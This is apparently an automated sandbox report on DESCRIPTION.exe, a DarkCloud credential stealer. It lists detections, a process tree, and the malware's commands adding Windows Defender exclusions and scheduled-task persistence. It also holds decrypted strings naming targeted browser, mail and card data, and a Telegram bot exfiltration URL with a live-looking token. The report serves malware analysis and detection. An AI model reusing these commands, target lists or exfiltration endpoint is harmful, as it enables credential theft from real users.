Edit tour

Windows Analysis Report
DESCRIPTION.exe

Overview

General Information

Sample name:	DESCRIPTION.exe
Analysis ID:	1591788
MD5:	93671481ec5215bb84afde48ad2280f1
SHA1:	1a4f8481cada880a1122d83707b3f9ea819f1139
SHA256:	00580380c811027c799634812e6f785df11f2f2eb3fa1718ac8c4ff47fd6ef2d
Tags:	exeuser-TeamDreier
Infos:

Detection

DarkCloud

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected DarkCloud

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes or reads registry keys via WMI

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DESCRIPTION.exe (PID: 180 cmdline: "C:\Users\user\Desktop\DESCRIPTION.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)

powershell.exe (PID: 2108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4032 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DESCRIPTION.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\DESCRIPTION.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)

OdoiXyuXnaQN.exe (PID: 5480 cmdline: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe MD5: 93671481EC5215BB84AFDE48AD2280F1)

schtasks.exe (PID: 5840 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

OdoiXyuXnaQN.exe (PID: 7124 cmdline: "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)

OdoiXyuXnaQN.exe (PID: 4824 cmdline: "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)

OdoiXyuXnaQN.exe (PID: 5348 cmdline: "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe" MD5: 93671481EC5215BB84AFDE48AD2280F1)

WmiPrvSE.exe (PID: 4428 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: DESCRIPTION.exe PID: 180	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: DESCRIPTION.exe PID: 180	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: OdoiXyuXnaQN.exe PID: 5480	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: OdoiXyuXnaQN.exe PID: 5348	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.DESCRIPTION.exe.3dfe800.0.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
1.2.DESCRIPTION.exe.3fe4798.1.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
1.2.DESCRIPTION.exe.3db4ec0.2.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
1.2.DESCRIPTION.exe.3fe4798.1.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
1.2.DESCRIPTION.exe.3dfe800.0.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", ProcessId: 2108, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe, ParentImage: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe, ParentProcessId: 5480, ParentProcessName: OdoiXyuXnaQN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp", ProcessId: 5840, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", ProcessId: 4032, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe", ProcessId: 2108, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DESCRIPTION.exe", ParentImage: C:\Users\user\Desktop\DESCRIPTION.exe, ParentProcessId: 180, ParentProcessName: DESCRIPTION.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp", ProcessId: 4032, ProcessName: schtasks.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpack

Malware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: DESCRIPTION.exe	Virustotal: Detection: 33%			Perma Link
Source: DESCRIPTION.exe	ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DESCRIPTION.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Cookies
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \Default\Login Data
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \Login Data
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: //setting[@name='Password']/value
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Password :
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: SMTP Email Address
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: NNTP Email Address
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Email
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: HTTPMail User Name
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: HTTPMail Server
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Password
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^389[0-9]{11}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: mail\
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^9[0-9]{15}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Mastercard
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Visa Card
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Visa Master Card
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \logins.json
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \signons.sqlite
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Foxmail.exe
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: EnableSignature
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Application : FoxMail
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: encryptedUsername
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: logins
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: encryptedPassword
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: Select * from Win32_ComputerSystem
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \cookies.db
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \Default\Cookies
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \Cookies
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \cookies.sqlite
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: \global-messages-db.sqlite
Source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack	String decryptor: C:\\MailMasterData

Source: DESCRIPTION.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DESCRIPTION.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: W.pdb4 source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: joip.pdbSHA256 source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr
Source:	Binary string: joip.pdb source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr

Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 162.55.60.2 162.55.60.2

Source: C:\Users\user\Desktop\DESCRIPTION.exe

Code function: 9_2_00438C80 InternetOpenA,InternetOpenUrlA,InternetReadFile,

9_2_00438C80

Source: DESCRIPTION.exe, 00000001.00000002.1500033277.00000000024B9000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 0000000A.00000002.1557268789.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/#z
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/)z
Source: DESCRIPTION.exe, OdoiXyuXnaQN.exe.1.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719577553.0000000004207000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/B
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/S
Source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720680009.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/mplates
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/t
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719577553.0000000004207000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com_P

System Summary

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_009F4204	1_2_009F4204
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_009F4659	1_2_009F4659
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_009FE704	1_2_009FE704
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_009F7088	1_2_009F7088
